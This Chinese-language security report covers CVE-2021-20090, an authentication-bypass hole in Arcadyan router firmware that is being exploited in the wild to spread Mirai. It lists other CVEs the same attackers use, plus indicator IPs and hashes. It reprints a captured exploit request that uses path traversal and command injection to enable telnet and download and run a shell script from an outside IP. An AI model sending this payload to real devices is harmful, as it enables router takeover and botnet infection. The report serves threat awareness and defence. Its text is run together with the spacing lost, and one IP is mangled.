CVE-2021-20090是由Tenable发现并于2021年8月3日发布的漏洞。现在,研究人员发现它正在被野外利用。该漏洞是一种路径绕过漏洞,可导致身份验证绕过,攻击者可利用该漏洞接管受影响设备的控制权。根据Tenable的相关信息披露,CVE-2021-20090漏洞被发现实际存在于Arcadyan固件中,影响的不仅是最初发现的Buffalo路由器,还有更多设备。影响范围如下:野外利用Juniper威胁实验室近期还发现,攻击者正在野外利用编号为CVE-2021-20090的身份验证绕过漏洞,通过该漏洞传播Mirai恶意软件。POST/images/..%2fapply_abstract.cgiHTTP/1.1Connection:closeUser-Agent:Darkaction=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0AARC_SYS_TelnetdEnable=1&%0AARC_SYS_t;mp=wget/http://19212..241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;chmod+777+lolol.sh;sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4不止CVE-2021-20090,新发现该攻击组织还经常利用新漏洞扩大其武器库:CVE-2020-29557(DLink路由器)CVE-2021-1497(CiscoHyperFlex)CVE-2021-1498(CiscoHyperFlex)CVE-2021-31755(TendaAC11)CVE-2021-22502(MicroFocusOBR)CVE-2021-22506(MicroFocusAM)exploit-db未分配CVE编号但存在PoC的exploitIOC27.22.80.19212.192.241.729793ac5afd1be5ec55476d2c205260d1b7af6db7cc29a9dc0f7fbee68a177c7873edf8bfbbeaccdd84204f24402dcf488c3533be2682724e5906396b9237411d8bb454cd942ce6680f083edf88ffa31661a47a45eb3681e1b36dd05043315399f83eadaa00e81ad51e3ab479b900b981346895b99d045a6b6f77491c3132b-58ce4bc34e321b31926fd2fa1696136187b13864dfa03fba6848e59f9f72bfa952980331cf89f3e6026b33b8f1bfa1c304295b9327311661d7927f78824f04cf528904f9b2e029595365f4f4426069b274810510908c7dd23a3791a831f51e9f1fc283f932f30756408a59dac97a6965eb792915242214d590eab1c6cb049148582c2f5bbf35afc7335f789e420c23c43a069ecfcca1a8f9fac5cd554a7a769440e70764ef9800c1d09f965fbb9698d0eda52448b23772d118f2f2c4ba37b59fc20
